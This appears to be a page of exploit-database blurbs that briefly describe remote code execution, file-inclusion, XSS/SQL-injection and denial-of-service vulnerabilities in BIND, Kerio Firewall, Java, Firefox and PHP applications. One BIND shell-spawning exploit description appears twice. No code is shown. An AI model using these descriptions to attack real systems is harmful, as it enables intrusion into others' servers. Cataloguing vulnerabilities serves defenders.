The code establishes a TCP connection with port 53 of a target system. It makes use of the 'infoleek' bug (through UDP) to obtain the base value of the named process frame stack pointer, which is later used for constructing proper DNS tsig exploit packet. Upon successful exploitation, the assembly routine gets executed. It walks the descriptor table of the exploited named process in a search for the socket descriptor of the previously established TCP connection. Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh is spawned. The use of such an assembly routine allows successful exploitation of the vulnerability in the case when vulnerable DNS servers are protected by tightly configured firewall systems (with only 53 tcp/udp port open).
This exploit allows an attacker to execute remote code on a target system running Kerio Personal Firewall v2.1.4. The exploit takes advantage of a vulnerability in the firewall software and allows the attacker to execute arbitrary code on the target system. The exploit has been tested on Windows XP with SP1.
Attackers can trigger an infinite-loop condition when the library tries to handle malformed image files. This allows them to consume excessive CPU resources on computers that use the affected software, denying service to legitimate users.
Kmita FAQ is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
The Mini Open CMS v.1.0.0 script is vulnerable to local file inclusion. This can be exploited by an attacker to include arbitrary files from the target system.
The ByteComponentRaster.verify() method in Oracle Java versions prior to 7u25 is vulnerable to a memory corruption vulnerability that allows bypassing of "dataOffsets[]" boundary checks. This vulnerability allows for remote code execution. User interaction is required for this exploit in that the target must visit a malicious page or open a malicious file.
This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.
The PHP-Nuke application fails to properly sanitize user-supplied input, resulting in multiple remote file-include vulnerabilities. An attacker can exploit these vulnerabilities to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This can lead to the compromise of the application and the underlying system.
Input passed to the 'f' parameter in "/manager/index.php" isn't properly verified before being used in an include function, this can be exploited to include local files on target host or execute command, we need admin credentials to exploit this vuln.
The code establishes a TCP connection with port 53 of a target system. It makes use of the "infoleak" bug (through UDP) to obtain the base value of the named process frame stack pointer, which is later used for constructing proper DNS tsig exploit packet. Upon successful exploitation, the assembly routine gets executed. It walks the descriptor table of the exploited named process in a search for the socket descriptor of the previously established TCP connection. Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh is spawned. The use of such an assembly routine allows successful exploitation of the vulnerability in the case when vulnerable DNS servers are protected by tightly configured firewall systems (with only 53 tcp/udp port open).
Services By CQR